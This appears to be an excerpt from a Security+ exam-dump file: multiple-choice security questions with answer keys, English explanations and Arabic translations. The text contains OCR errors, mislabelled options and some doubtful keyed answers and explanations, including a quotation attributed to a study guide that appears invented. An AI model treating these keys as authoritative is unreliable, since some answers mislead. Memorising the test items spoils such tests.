‫ معظم المستخدمين بعيدون و يتصلون بمركز بيانات الشركة الذي يضم‬VPN ‫تقوم المؤسسة بتوجيه كل حركة المرور الخاصة بها من خلال‬
‫ أي مما يلي هو أضعف عنصر تصميم؟‬.‫ ومركز البيانات نفسه‬VPN ‫ وخادم‬DLP ‫ يليه جهاز‬، ‫معلومات سرية يوجد جدار حماية على حدود الإنترنت‬
.‫ المشفرة عند الدخول إلى الشبكة أو مغادرتها‬VPN ‫لن يتم فحص حركة مرور‬
‫ هذا يعني أيضا أنه لا يمكن‬، ‫ ومع ذلك‬.‫ (الشبكة الافتراضية الخاصة) لحماية سريتها وسلامتها عبر الإنترنت‬VPN ‫ يتم تشفير حركة مرور‬:‫تفسير‬
‫ يمكن أن يؤدي ذلك إلى إنشاء نقطة‬.‫ ما لم يتم فك تشفيرها أولا‬، ‫فحصه بواسطة أجهزة أو أدوات الأمان عند الدخول إلى الشبكة أو الخروج منها‬
VPN ‫ حيث يمكن لحركة المرور أو البيانات الضارة تجاوز آليات الكشف أو الوقاية باستخدام تشفير‬، ‫عمياء أو ثغرة أمنية لموقف أمان الشبكة‬
126 / 198
The safer , easier way to help you pass any IT exams.
235.A security administrator needs to provide secure access to internal networks for external partners
The administrator has given the PSK and other parameters to the third-party security administrator.
Which of the following is being used to establish this connection?
A. Kerberos
B. SSL/TLS
C. IPSec
D. SSH
Answer: C
Explanation:
IPSec is a protocol suite that provides secure communication over IP networks. It uses encryption,
authentication, and integrity mechanisms to protect data from unauthorized access or modification.
IPSec can operate in two modes: transport mode and tunnel mode. In tunnel mode, IPSec can create a
virtual private network (VPN) between two endpoints, such as external partners and internal networks. To
establish a VPN connection, IPSec requires a pre-shared key (PSK) or other parameters to negotiate the
security association.
‫ ومعلمات أخرى‬PSK ‫يحتاج مسؤول الأمان إلى توفير وصول آمن إلى الشبكات الداخلية للشركاء الخارجيين أعطى المسؤول‬
‫ أي من الآتي يستخدم لإنشاء هذا الاتصال؟‬.‫لمسؤول الأمان التابع لجهة خارجية‬
‫ يستخدم آليات التشفير والمصادقة والسلامة‬.IP ‫ عبارة عن مجموعة بروتوكولات توفر اتصالا آمنا عبر شبكات‬IPSec :‫تفسير‬
‫ في‬.‫ وضع النقل ووضع النفق‬:‫ في وضعين‬IPSec ‫ يمكن أن يعمل‬.‫لحماية البيانات من الوصول أو التعديل غير المصرح به‬
‫ مثل الشركاء الخارجيين والشبكات‬، ‫) بين نقطتي نهاية‬VPN( ‫ إنشاء شبكة افتراضية خاصة‬IPSec ‫ يمكن ل‬، ‫وضع النفق‬
.‫) أو معلمات أخرى للتفاوض على اقتران الأمان‬PSK( ‫ مفتاحا مشتركا مسبقا‬IPSec ‫ يتطلب‬، VPN ‫ لإنشاء اتصال‬.‫الداخلية‬
236.Which of the following roles is responsible for defining the protection type and Classification type for
a given set of files?
A. General counsel
B. Data owner
C. Risk manager
D. Chief Information Officer
Answer: B
Explanation:
Data owner is the role that is responsible for defining the protection type and classification type for a
given set of files. Data owner is a person in the organization who is accountable for a certain set of data
and determines how it should be protected and classified. General counsel is the role that provides legal
advice and guidance to the organization. Risk manager is the role that identifies, analyzes, and mitigates
risks to the organization. Chief Information Officer is the role that oversees the information technology
strategy and operations of the organization.
‫أي من الأدوار التالية مسؤول عن تحديد نوع الحماية ونوع التصنيف لمجموعة معينة من الملفات؟ مالك البيانات‬.236
‫ مالك البيانات‬.‫ مالك البيانات هو الدور المسؤول عن تحديد نوع الحماية ونوع التصنيف لمجموعة معينة من الملفات‬:‫تفسير‬
‫ المستشار العام هو الدور‬.‫هو شخص في المؤسسة مسؤول عن مجموعة معينة من البيانات ويحدد كيفية حمايتها وتصنيفها‬
‫ مدير المخاطر هو الدور الذي يحدد ويحلل ويخفف من المخاطر التي تتعرض‬.‫الذي يقدم المشورة والتوجيه القانوني للمنظمة‬
.‫ كبير موظفي المعلومات هو الدور الذي يشرف على استراتيجية وعمليات تكنولوجيا المعلومات في المنظمة‬.‫لها المنظمة‬
127 / 198
The safer , easier way to help you pass any IT exams.
237.A penetration tester was able to compromise a host using previously captured network traffic.
Which of the following is the result of this action?
A. Integer overflow
B. Race condition
C. Memory leak
D. Replay attack
Answer: D
Explanation:
A replay attack is a form of network attack in which valid data transmission is maliciously or fraudulently
repeated or delayed12. This can allow an attacker to compromise a host by resending a previously
captured message, such as a password or a session token, that looks legitimate to the receiver1. A
replay attack can be prevented by using methods such as random session keys, timestamps, or onetime passwords that expire after use12.
‫ أي من الآتي ناتج عن‬.‫ وتمكن أحد مختبري الاختراق من اختراق مضيف باستخدام حركة مرور الشبكة التي تم التقاطها مسبقا‬-237
‫هذا الإجراء؟ هجوم الإعادة‬
‫ هجوم إعادة التشغيل هو شكل من أشكال هجوم الشبكة يتم فيه تكرار أو تأخير نقل البيانات الصالحة بشكل ضار أو‬:‫تفسير‬
‫ مثل كلمة مرور أو رمز‬،‫ يمكن أن يسمح ذلك للمهاجم باختراق مضيف عن طريق إعادة إرسال رسالة تم التقاطها مسبقا‬.12‫احتيالي‬
‫ يمكن منع هجوم إعادة التشغيل باستخدام طرق مثل مفاتيح الجلسة العشوائية أو‬.1‫ تبدو شرعية لجهاز الاستقبال‬،‫مميز للجلسة‬
.12‫الطوابع الزمنية أو كلمات المرور لمرة واحدة التي تنتهي صلاحيتها بعد الاستخدام‬
238. Sales team members have been receiving threatening voicemail messages and have reported these
incidents to the IT security team.
Which of the following would be MOST appropriate for the IT security team to analyze?
A. Access control
B. Syslog
C. Session Initiation Protocol traffic logs
D. Application logs
Answer: B
Explanation:
Syslogs are log files that are generated by devices on the network and contain information about
network activity, including user logins, device connections, and other events. By analyzing these logs,
the IT security team can identify the source of the threatening voicemail messages and take the
necessary steps to address the issue.
‫ أي مما يلي‬.‫تلقى أعضاء فريق المبيعات رسائل بريد صوتي تهديدية وأبلغوا فريق أمان تكنولوجيا المعلومات بهذه الحوادث‬
‫سيكون الأنسب لفريق أمن تكنولوجيا المعلومات لتحليله؟ سيسلوق‬
‫ سجلات النظام هي ملفات سجل يتم إنشاؤها بواسطة الأجهزة الموجودة على الشبكة وتحتوي على معلومات حول‬:‫تفسير‬
‫ من خلال تحليل هذه السجلات‬.‫ بما في ذلك عمليات تسجيل دخول المستخدم واتصالات الجهاز والأحداث الأخرى‬،‫نشاط الشبكة‬
‫ يمكن لفريق أمان تكنولوجيا المعلومات تحديد مصدر رسائل البريد الصوتي المهددة واتخاذ الخطوات اللازمة لمعالجة‬،
.‫المشكلة‬
128 / 198
The safer , easier way to help you pass any IT exams.
239. Which Of the following is the best method for ensuring non-repudiation ?
A. SSO
B. Digital certificate
C. Token
D. SSH key
Answer: B
Explanation:
A digital certificate is an electronic document that contains the public key and identity information of an
entity, such as a person, organization, website, etc. It is issued and signed by a trusted authority called a
certificate authority (CA). It can provide non-repudiation by proving the identity and authenticity of the
sender and verifying the integrity of the message or data.
‫أي مما يلي هو أفضل طريقة لضمان عدم التنصل ؟ شهادة رقمية‬
‫ مثل شخص أو‬، ‫ الشهادة الرقمية هي مستند إلكتروني يحتوي على المفتاح العام ومعلومات الهوية الخاصة بكيان ما‬:‫تفسير‬
‫ يمكن أن يوفر عدم‬.)CA( ‫ يتم إصدارها وتوقيعها من قبل مرجع موثوق به يسمى المرجع المصدق‬.‫ إلخ‬، ‫منظمة أو موقع ويب‬
.‫التنصل من خلال إثبات هوية المرسل وصحته والتحقق من سلامة الرسالة أو البيانات‬
240. Which of the following models offers third-party-hosted, on-demand computing resources that can
be shared with multiple organizations over the internet?
A. Public cloud
B. Hybrid cloud
C. Community cloud
D. Private cloud
Answer: A
Explanation:
There are three main models for cloud computing: Infrastructure as a Service (IaaS), Platform as a
Service (PaaS), and Software as a Service (SaaS)12. Each model represents a different part of the
cloud computing stack and provides different levels of control, flexibility, and management.
According to one source1, a public cloud is a type of cloud deployment where the cloud resources (such
as servers and storage) are owned and operated by a third-party cloud service provider and delivered
over the Internet. A public cloud can be shared with multiple organizations or users who pay for the
service on a subscription or pay-as-you-go basis.
‫أي من النماذج التالية يوفر موارد حوسبة مستضافة من جهات خارجية عند الطلب يمكن مشاركتها مع مؤسسات متعددة عبر‬
‫الإنترنت؟ البيئة السحابية العامة‬
‫) والبرمجيات كخدمة‬PaaS( ‫) والمنصة كخدمة‬IaaS( ‫ البنية التحتية كخدمة‬:‫ هناك ثلاثة نماذج رئيسية للحوسبة السحابية‬:‫تفسير‬
.‫ يمثل كل نموذج جزءا مختلفا من مكدس الحوسبة السحابية ويوفر مستويات مختلفة من التحكم والمرونة والإدارة‬.12)SaaS(
)‫ فإن السحابة العامة هي نوع من النشر السحابي حيث تكون الموارد السحابية (مثل الخوادم والتخزين‬،1‫وفقا لأحد المصادر‬
‫ يمكن مشاركة السحابة العامة مع‬.‫مملوكة ومدارة من قبل مزود خدمة سحابية تابع لجهة خارجية ويتم تسليمها عبر الإنترنت‬
‫العديد من المؤسسات أو المستخدمين الذين يدفعون مقابل الخدمة على أساس الاشتراك أو الدفع أولا بأول‬
129 / 198
The safer , easier way to help you pass any IT exams.
241.A company wants to build a new website to sell products online. The website wd I host a storefront
application that allow visitors to add products to a shopping cart and pay for products using a credit card.
Which Of the following protocols •would be most secure to implement?
A. SSL
B. SFTP
C. SNMP
D. TLS
Answer: D
Explanation:
TLS (Transport Layer Security) is a cryptographic protocol that provides secure communication over the
internet. It can protect the data transmitted between the website and the visitors from eavesdropping,
tampering, etc. It is the most secure protocol to implement for a website that sells products online using
a credit card.
‫ تطبيقا لواجهة المتجر يسمح‬wd ‫ يستضيف موقع الويب‬.‫ تريد شركة إنشاء موقع شبكي جديد لبيع المنتجات عبر الإنترنت‬-241
‫ أي من البروتوكولات التالية سيكون‬.‫للزوار بإضافة منتجات إلى عربة التسوق ودفع ثمن المنتجات باستخدام بطاقة الائتمان‬
‫أكثر أمانا للتنفيذ؟ تسل‬
‫ يمكنه حماية البيانات المنقولة بين الموقع‬.‫ (أمان طبقة النقل) هو بروتوكول تشفير يوفر اتصالا آمنا عبر الإنترنت‬TLS :‫تفسير‬
‫ إنه البروتوكول الأكثر أمانا لتنفيذه لموقع ويب يبيع المنتجات عبر الإنترنت باستخدام بطاقة‬.‫ إلخ‬، ‫ العبث‬، ‫والزوار من التنصت‬
.‫ائتمان‬
242.A security practitioner is performing due diligence on a vendor that is being considered for cloud
services. Which of the following should the practitioner consult for the best insight into the current
security posture of the vendor?
A. PCI DSS standards
B. SLA contract
C. CSF framework
D. SOC 2 report
Answer: D
Explanation:
A SOC 2 report is a document that provides an independent assessment of a service organization’s
controls related to the Trust Services Criteria of Security, Availability, Processing Integrity, Confidentiality,
or Privacy. A SOC 2 report can help a security practitioner evaluate the current security posture of a
vendor that provides cloud services1.
‫ أي مما يلي يجب على الممارس استشارته‬.‫يبذل ممارس أمني العناية الواجبة على بائع يجري النظر في خدماته السحابية‬-242
‫ تقرير‬2 ‫للحصول على أفضل نظرة ثاقبة للوضع الأمني الحالي للبائع؟ سوك‬
‫ هو مستند يوفر تقييما مستقلا لضوابط مؤسسة الخدمة المتعلقة بمعايير خدمات الثقة للأمان أو التوفر‬2 SOC ‫ تقرير‬:‫تفسير‬
‫ ممارس الأمان في تقييم الوضع الأمني الحالي‬2 SOC ‫ يمكن أن يساعد تقرير‬.‫أو سلامة المعالجة أو السرية أو الخصوصية‬
.1‫للمورد الذي يقدم الخدمات السحابية‬
130 / 198
The safer , easier way to help you pass any IT exams.
243.A security investigation revealed mat malicious software was installed on a server using a server
administrator credentials. During the investigation the server administrator explained that Telnet was
regularly used to log in. Which of the blowing most likely occurred?
A. A spraying attack was used to determine which credentials to use
B. A packet capture tool was used to steal the password
C. A remote-access Trojan was used to install the malware
D. A directory attack was used to log in as the server administrator
Answer: B
Explanation:
Telnet is an insecure protocol that transmits data in cleartext over the network. This means that anyone
who can intercept the network traffic can read the data, including the username and password of the
server administrator. A packet capture tool is a software or hardware device that can capture and
analyze network packets. An attacker can use a packet capture tool to steal the password and use it to
install malicious software on the server.
‫ أوضح مسؤول الخادم أن‬، ‫ أثناء التحقيق‬.‫ وكشف تحقيق أمني عن تثبيت برمجيات خبيثة على خادم باستخدام بيانات اعتماد مسؤول الخادم‬-243
‫ أي من النفخ حدث على الأرجح؟ تم استخدام أداة التقاط الحزمة لسرقة كلمة المرور‬.‫ كان يستخدم بانتظام لتسجيل الدخول‬Telnet
‫ هذا يعني أن أي شخص يمكنه اعتراض حركة مرور الشبكة يمكنه قراءة‬.‫ هو بروتوكول غير آمن ينقل البيانات بنص واضح عبر الشبكة‬Telnet :‫تفسير‬
.‫ أداة التقاط الحزم هي برنامج أو جهاز يمكنه التقاط حزم الشبكة وتحليلها‬.‫ بما في ذلك اسم المستخدم وكلمة المرور لمسؤول الخادم‬، ‫البيانات‬
.‫يمكن للمهاجم استخدام أداة التقاط الحزم لسرقة كلمة المرور واستخدامها لتثبيت برامج ضارة على الخادم‬
244.A company is switching to a remote work model for all employees. All company and employee
resources will be in the cloud. Employees must use their personal computers to access the cloud
computing environment. The company will manage the operating system.
Which of the following deployment models is the company implementing?
A. CYOD
B. MDM
C. COPE
D. VDI
Answer: D
Explanation:
According to Professor Messer’s video1, VDI stands for Virtual Desktop Infrastructure and it is a
deployment model where employees use their personal computers to access a virtual machine that runs
the company’s operating system and applications.
In the scenario described, the company is implementing a virtual desktop infrastructure (VDI)
deployment model [1]. This allows employees to access the cloud computing environment using their
personal computers, while the company manages the operating system. The VDI model is suitable for
remote work scenarios because it provides secure and centralized desktop management, while allowing
employees to access desktops from any device.
‫ يجب على الموظفين استخدام‬.‫ ستكون جميع موارد الشركة والموظفين في السحابة‬.‫ تتحول شركة إلى نموذج العمل عن بعد لجميع الموظفين‬-244
‫ أي من نماذج النشر التالية‬.‫ ستقوم الشركة بإدارة نظام التشغيل‬.‫أجهزة الكمبيوتر الشخصية الخاصة بهم للوصول إلى بيئة الحوسبة السحابية‬
‫تنفذها الشركة؟ فدي‬
‫ إلى البنية التحتية لسطح المكتب الافتراضي وهو نموذج نشر حيث يستخدم الموظفون أجهزة‬VDI ‫ يرمز‬، 1 ‫ وفقا لفيديو البروفيسور ميسر‬:‫تفسير‬
‫ تقوم الشركة بتنفيذ‬،‫ في السيناريو الموضح‬.‫الكمبيوتر الشخصية الخاصة بهم للوصول إلى جهاز افتراضي يدير نظام تشغيل الشركة وتطبيقاتها‬
‫ يتيح ذلك للموظفين الوصول إلى بيئة الحوسبة السحابية باستخدام أجهزة الكمبيوتر‬.]1[ )VDI( ‫نموذج نشر البنية التحتية لسطح المكتب الظاهري‬
‫ مناسبا لسيناريوهات العمل عن بعد لأنه يوفر إدارة سطح مكتب آمنة‬VDI ‫ يعد نموذج‬.‫ بينما تدير الشركة نظام التشغيل‬، ‫الشخصية الخاصة بهم‬
.‫ مع السماح للموظفين بالوصول إلى أجهزة سطح المكتب من أي جهاز‬، ‫ومركزية‬
131 / 198
The safer , easier way to help you pass any IT exams.
245.A security administrator Is evaluating remote access solutions for employees who are geographically
dispersed. Which of the following would provide the MOST secure remote access? (Select TWO).
A. IPSec
B. SFTP
C. SRTP
D. LDAPS
E. S/MIME
F. SSL VPN
Answer: A,F
Explanation:
IPSec (Internet Protocol Security) is a technology that provides secure communication over the internet
by encrypting traffic and authenticating it at both the sender and receiver. It can be used to create secure
tunnels between two or more devices, allowing users to access resources securely and privately.
SSL VPN (Secure Sockets Layer Virtual Private Network) is a type of VPN that uses an SSL/TLS
connection to encrypt traffic between two or more devices. It is a secure and reliable solution for
providing remote access, as all traffic is encrypted and authenticated. Additionally, SSL VPNs can also
be used to restrict access to certain websites and services, making them a secure and robust solution for
remote access.
‫ أي مما يلي سيوفر الوصول عن بعد الأكثر‬.‫ يقوم مسؤول الأمن بتقييم حلول الوصول عن بعد للموظفين الموزعين جغرافيا‬-245
.)‫أمانا؟ (اختر اثنين‬
‫ (أمان بروتوكول الإنترنت) هي تقنية توفر اتصالا آمنا عبر الإنترنت عن طريق تشفير حركة المرور والمصادقة عليها في‬IPSec :‫تفسير‬
‫ مما يسمح للمستخدمين بالوصول إلى الموارد‬، ‫ يمكن استخدامه لإنشاء أنفاق آمنة بين جهازين أو أكثر‬.‫كل من المرسل والمتلقي‬
TLS / SSL ‫ يستخدم اتصال‬VPN ‫ (الشبكة الافتراضية الخاصة لطبقة مآخذ التوصيل الآمنة) هي نوع من‬VPN SSL .‫بشكل آمن وخاص‬
‫ حيث يتم تشفير كل حركة المرور والمصادقة‬، ‫ إنه حل آمن وموثوق لتوفير الوصول عن بعد‬.‫لتشفير حركة المرور بين جهازين أو أكثر‬
‫ مما يجعلها حلا آمنا‬، ‫ لتقييد الوصول إلى مواقع وخدمات معينة‬VPN SSL ‫ يمكن أيضا استخدام شبكات‬، ‫ بالإضافة إلى ذلك‬.‫عليها‬
.‫وقويا للوصول عن بعد‬
246.A security team suspects that the cause of recent power consumption overloads is the unauthorized
use of empty power outlets in the network rack. Which of the following options will mitigate this issue
without compromising the number of outletsavailable?
A. Adding a new UPS dedicated to the rack
B. Installing a managed PDU
C. Using only a dual power supplies unit
D. Increasing power generator capacity
Answer: B
Explanation:
Installing a managed PDU is the most appropriate option to mitigate the issue without compromising the
number of outlets available. A managed Power Distribution Unit (PDU) helps monitor, manage, and
control power consumption at the rack level. By installing a managed PDU, the security team will have
greater visibility into power usage in the network rack, and they can identify and eliminate unauthorized
devices that consume excessive power from empty outlets.
‫ و يشتبه فريق أمني في أن سبب التحميل الزائد الأخير لاستهلاك الطاقة هو الاستخدام غير المأذون به لمنافذ الطاقة‬-246
‫ أي من الخيارات التالية سيخفف من هذه المشكلة دون المساس بعدد المنافذ المتاحة؟‬.‫الفارغة في حامل الشبكة‬
‫تثبيت وحدة توزيع بيانات مدارة‬
.‫ يعد تثبيت وحدة توزيع الطاقة المدارة هو الخيار الأنسب للتخفيف من المشكلة دون المساس بعدد المنافذ المتاحة‬:‫تفسير‬
‫ من خلال‬.‫) على مراقبة استهلاك الطاقة وإدارته والتحكم فيه على مستوى الحامل‬PDU( ‫تساعد وحدة توزيع الطاقة المدارة‬
‫ ويمكنهم تحديد وإزالة غير المصرح‬، ‫ سيكون لدى فريق الأمان رؤية أكبر لاستخدام الطاقة في حامل الشبكة‬، ‫ مدار‬PDU ‫تثبيت‬
.‫به الأجهزة التي تستهلك طاقة زائدة من المنافذ الفارغة‬
132 / 198
The safer , easier way to help you pass any IT exams.
247.An upcoming project focuses on secure communications and trust between external parties.
Which of the following security components will need to be considered to ensure a chosen trust provider
IS used and the selected option is highly scalable?
A. Self-signed certificate
B. Certificate attributes
C. Public key Infrastructure
D. Domain validation
Answer: C
Explanation:
PKI is a security technology that enables secure communication between two parties by using
cryptographic functions. It consists of a set of components that are used to create, manage, distribute,
store, and revoke digital certificates. PKI provides a secure way to exchange data between two parties,
as well as a trust provider to ensure that the data is not tampered with. It also helps to create a highly
scalable solution, as the same certificate can be used for multiple parties.
According to the CompTIA Security+ Study Guide, “PKI is a technology used to secure communications
between two external parties. PKI is based on the concept of digital certificates, which are used to
authenticate the sender and recipient of a message. PKI provides a trust provider to ensure that the
digital certificate is valid and has not been tampered with. It also provides a scalable solution, as multiple
parties can use the same certificate.”
‫ أي من مكونات الأمان التالية يجب مراعاته لضمان استخدام موفر‬.‫ ويركز مشروع قادم على تأمين الاتصالات والثقة بين الأطراف الخارجية‬-247
‫ والخيار المحدد قابل للتطوير بدرجة كبيرة؟ البنية التحتية للمفتاح العام‬IS ‫الثقة المختار‬
‫ يتكون من مجموعة من المكونات التي يتم استخدامها لإنشاء‬.‫ هي تقنية أمان تتيح الاتصال الآمن بين طرفين باستخدام وظائف التشفير‬PKI :‫تفسير‬
‫ بالإضافة إلى مزود ثقة لضمان عدم‬، ‫ طريقة آمنة لتبادل البيانات بين طرفين‬PKI ‫ يوفر‬.‫الشهادات الرقمية وإدارتها وتوزيعها وتخزينها وإبطالها‬
‫ وفقا لدليل دراسة‬.‫ حيث يمكن استخدام نفس الشهادة لأطراف متعددة‬، ‫ كما أنه يساعد على إنشاء حل قابل للتطوير بدرجة كبيرة‬.‫العبث بالبيانات‬
‫ ويستند مرفق المفاتيح العمومية إلى مفهوم الشهادات‬.‫ هي تقنية تستخدم لتأمين الاتصالات بين طرفين خارجيين‬PKI" ، + Security CompTIA
‫ كما أنه يوفر حلا‬.‫ مزود ثقة للتأكد من أن الشهادة الرقمية صالحة ولم يتم العبث بها‬PKI ‫ يوفر‬.‫ التي تستخدم لتوثيق مرسل الرسالة ومتلقيها‬،‫الرقمية‬
." ‫ حيث يمكن لأطراف متعددة استخدام نفس الشهادة‬، ‫قابلا للتطوير‬
248.A security analyst is using OSINT to gather information to verify whether company data is available
publicly. Which of the following is the BEST application for the analyst to use?
A. theHarvester
B Cuckoo
B. Nmap
C. Nessus
Answer: A
Explanation:
The Harvester is a reconnaissance tool that is used to gather information about a target organization,
such as email addresses, subdomains, and IP addresses. It can also be used to gather information
about a target individual, such as email addresses, phone numbers, and social media profiles. The
Harvester is specifically designed for OSINT (Open-Source Intelligence) and it can be used to discover
publicly available information about a target organization or individual.
‫ أي مما يلي‬.‫ لجمع المعلومات للتحقق مما إذا كانت بيانات الشركة متاحة للجمهور‬OSINT ‫ و يستخدم محلل أمني نظام‬-248
‫هو أفضل تطبيق يستخدمه المحلل؟ حصادة‬
‫ مثل عناوين البريد الإلكتروني‬، ‫ الحاصدة هي أداة استطلاع تستخدم لجمع معلومات حول مؤسسة مستهدفة‬:‫تفسير‬
‫ مثل عناوين البريد الإلكتروني‬، ‫ يمكن استخدامه أيضا لجمع معلومات حول الفرد المستهدف‬.IP ‫والنطاقات الفرعية وعناوين‬
‫ (ذكاء المصدر المفتوح) ويمكن‬OSINT ‫ خصيصا ل‬Harvester ‫ تم تصميم‬.‫وأرقام الهواتف وملفات تعريف الوسائط الاجتماعية‬
.‫استخدامه لاكتشاف المعلومات المتاحة للجمهور حول منظمة أو فرد مستهدف‬
133 / 198
The safer , easier way to help you pass any IT exams.
249. Which of the following is a solution that can be used to stop a disgruntled employee from copying
confidential data to a USB drive?
A. DLP
B. TLS
C. AV
D. IDS
Answer: A
Explanation:
DLP stands for data loss prevention, which is a set of tools and processes that aim to prevent
unauthorized access, use, or transfer of sensitive data. DLP can help mitigate the risk of data exfiltration
by disgruntled employees or external attackers by monitoring and controlling data flows across
endpoints, networks, and cloud services. DLP can also detect and block attempts to copy, transfer, or
upload sensitive data to a USB drive or other removable media based on predefined policies and rules.
‫؟ دلب‬USB ‫أي مما يلي يمثل حلا يمكن استخدامه لمنع موظف ساخط من نسخ بيانات سرية إلى محرك أقراص‬
‫ وهي مجموعة من الأدوات والعمليات التي تهدف إلى منع الوصول غير المصرح به‬، ‫ تعني منع فقدان البيانات‬DLP :‫تفسير‬
‫ في التخفيف من مخاطر استخراج البيانات من قبل‬DLP ‫ يمكن أن تساعد‬.‫إلى البيانات الحساسة أو استخدامها أو نقلها‬
‫الموظفين الساخطين أو المهاجمين الخارجيين من خلال مراقبة تدفقات البيانات والتحكم فيها عبر نقاط النهاية والشبكات‬
‫ يمكن لميزة "منع فقدان البيانات" أيضا اكتشاف ومنع محاولات نسخ البيانات الحساسة أو نقلها أو‬.‫والخدمات السحابية‬
.‫ أو وسائط أخرى قابلة للإزالة استنادا إلى سياسات وقواعد محددة مسبقا‬USB ‫تحميلها إلى محرك أقراص‬
250. Which of the following would a security analyst use to determine if other companies in the same
sector have seen similar malicious activity against their systems?
A. Vulnerability scanner
B. Open-source intelligence
C. Packet capture
D. Threat feeds
Answer: D
Explanation:
Threat feeds, also known as threat intelligence feeds, are a source of information about current and
emerging threats, vulnerabilities, and malicious activities targeting organizations. Security analysts use
threat feeds to gather information about attacks and threats targeting their industry or sector. These
feeds are typically provided by security companies, research organizations, or industry-specific groups.
By using threat feeds, analysts can identify trends, patterns, and potential threats that may target their
own organization,allowing them to take proactive steps to protect their systems.
‫أي مما يلي سيستخدمه محلل الأمان لتحديد ما إذا كانت الشركات الأخرى في نفس القطاع قد شهدت نشاطا ضارا مماثلا ضد‬
‫أنظمتها؟ موجزات التهديدات‬
‫ مصدرا للمعلومات حول التهديدات‬،‫ المعروفة أيضا باسم موجزات المكافحة الذكية للتهديدات‬،‫ تعد موجزات التهديدات‬:‫تفسير‬
‫ يستخدم محللو الأمن موجزات التهديدات لجمع‬.‫الحالية والناشئة ونقاط الضعف والأنشطة الضارة التي تستهدف المؤسسات‬
‫ عادة ما يتم توفير هذه الخلاصات من قبل شركات‬.‫المعلومات حول الهجمات والتهديدات التي تستهدف صناعتهم أو قطاعهم‬
‫ يمكن للمحللين تحديد الاتجاهات‬،‫ باستخدام موجزات التهديدات‬.‫الأمان أو المؤسسات البحثية أو المجموعات الخاصة بالصناعة‬
.‫ مما يسمح لهم باتخاذ خطوات استباقية لحماية أنظمتهم‬،‫والأنماط والتهديدات المحتملة التي قد تستهدف مؤسستهم‬
134 / 198
The safer , easier way to help you pass any IT exams.
251.A company is focused on reducing risks from removable media threats. Due to certain primary
applications, removable media cannot be entirely prohibited at this time.
Which of the following best describes the company's approach?
A. Compensating controls
B. Directive control
C. Mitigating controls
D. Physical security controls
Answer: C
Explanation:
Mitigating controls are designed to reduce the impact or severity of an event that has occurred or is likely
to occur. They do not prevent or detect the event, but rather limit the damage or consequences of it. For
example, a backup system is a mitigating control that can help restore data after a loss or corruption.
In this case, the company is focused on reducing risks from removable media threats, which are threats
that can compromise data security, introduce malware infections, or cause media failure123. Removable
media threats can be used to bypass network defenses and target industrial/OT environments2. The
company cannot prohibit removable media entirely because of certain primary applications that require
them, so it implements mitigating controls to lessen the potential harm from these threats.
Some examples of mitigating controls for removable media threats are:
✑ Encrypting data on removable media
✑ Scanning removable media for malware before use
✑ Restricting access to removable media ports
✑ Implementing policies and procedures for removable media usage and disposal
✑ Educating users on the risks and best practices of removable media
‫ نظرا لبعض التطبيقات الأساسية‬.‫ تركز إحدى الشركات على الحد من المخاطر الناجمة عن تهديدات الوسائط القابلة للإزالة‬-251
‫ أي مما يلي يصف نهج الشركة وصفا صحيحا؟‬.‫ لا يمكن حظر الوسائط القابلة للإزالة تماما في الوقت الحالي‬،
‫تخفيف الضوابط‬
‫ فهي لا تمنع أو تكتشف‬.‫ تم تصميم عناصر التحكم المخففة لتقليل تأثير أو شدة حدث وقع أو من المحتمل أن يحدث‬:‫تفسير‬
‫ نظام النسخ الاحتياطي هو عنصر تحكم مخفف يمكن أن يساعد في‬، ‫ على سبيل المثال‬.‫ بل تحد من أضراره أو عواقبه‬، ‫الحدث‬
‫ تركز الشركة على تقليل المخاطر الناجمة عن تهديدات الوسائط القابلة‬،‫ في هذه الحالة‬.‫استعادة البيانات بعد الفقد أو التلف‬
‫ أو تتسبب في فشل‬،‫ أو تسبب إصابات بالبرامج الضارة‬،‫ وهي تهديدات يمكن أن تعرض أمن البيانات للخطر‬،‫للإزالة‬
.2 ‫التشغيلية‬/‫ يمكن استخدام تهديدات الوسائط القابلة للإزالة لتجاوز دفاعات الشبكة واستهداف البيئات الصناعية‬.123‫الوسائط‬
‫ لذلك فهي تنفذ ضوابط‬، ‫لا يمكن للشركة حظر الوسائط القابلة للإزالة تماما بسبب بعض التطبيقات الأساسية التي تتطلبها‬
‫ فيما يلي بعض الأمثلة على عناصر التحكم في التخفيف من تهديدات‬.‫مخففة لتقليل الضرر المحتمل من هذه التهديدات‬
‫ ✑ تشفير البيانات على الوسائط القابلة للإزالة ✑ فحص الوسائط القابلة للإزالة بحثا عن البرامج‬:‫الوسائط القابلة للإزالة‬
‫الضارة قبل الاستخدام ✑ تقييد الوصول إلى منافذ الوسائط القابلة للإزالة ✑ تنفيذ سياسات وإجراءات استخدام الوسائط‬
.‫القابلة للإزالة والتخلص منها ✑ تثقيف المستخدمين حول مخاطر الوسائط القابلة للإزالة وأفضل ممارساتها‬
135 / 198
The safer , easier way to help you pass any IT exams.
252. An annual information security has revealed that several OS-level configurations are not in
compliance due to Outdated hardening standards the company is using.
Which Of the following would be best to use to update and reconfigure the OS.level security
configurations?
A. CIS benchmarks
B. GDPR guidance
C. Regional regulations
D. ISO 27001 standards
Answer: A
Explanation:
CIS benchmarks are best practices and standards for securing various operating systems, applications,
cloud environments, etc. They are developed by a community of experts and updated regularly to reflect
the latest threats and vulnerabilities. They can be used to update and reconfigure the OS-level security
configurations to ensure compliance and reduce risks.
‫كشف أمن المعلومات السنوي أن العديد من التكوينات على مستوى نظام التشغيل ليست متوافقة بسبب معايير التصلب‬
‫؟‬level.OS ‫ أي مما يلي سيكون من الأفضل استخدامه لتحديث وإعادة تكوين تكوينات أمان‬.‫القديمة التي تستخدمها الشركة‬
‫المعايير المرجعية لرابطة الدول المستقلة‬
‫ هي أفضل الممارسات والمعايير لتأمين مختلف أنظمة التشغيل والتطبيقات والبيئات السحابية وما إلى‬CIS ‫ معايير‬:‫تفسير‬
‫ يمكن استخدامها‬.‫ يتم تطويرها من قبل مجتمع من الخبراء ويتم تحديثها بانتظام لتعكس أحدث التهديدات ونقاط الضعف‬.‫ذلك‬
.‫لتحديث وإعادة تكوين تكوينات الأمان على مستوى نظام التشغيل لضمان الامتثال وتقليل المخاطر‬
253. An account was disabled atter several failed and successful login connections were made from
various parts of the Word at various times. A security analysts investigating the issue.
Which of the following account policies most likely triggered the action to disable the
A. Time based logins
B. Password history
C. Geofencing
D. Impossible travel time
Answer: D
Explanation:
Impossible travel time is a policy that detects and blocks login attempts from locations that are
geographically impossible to reach from the previous login location within a certain time frame. For
example, if a user logs in from New York and then tries to log in from Tokyo within an hour, the policy
would flag this as impossible travel time and disable the account. This policy helps prevent unauthorized
access from compromised credentials or attackers using proxy servers.
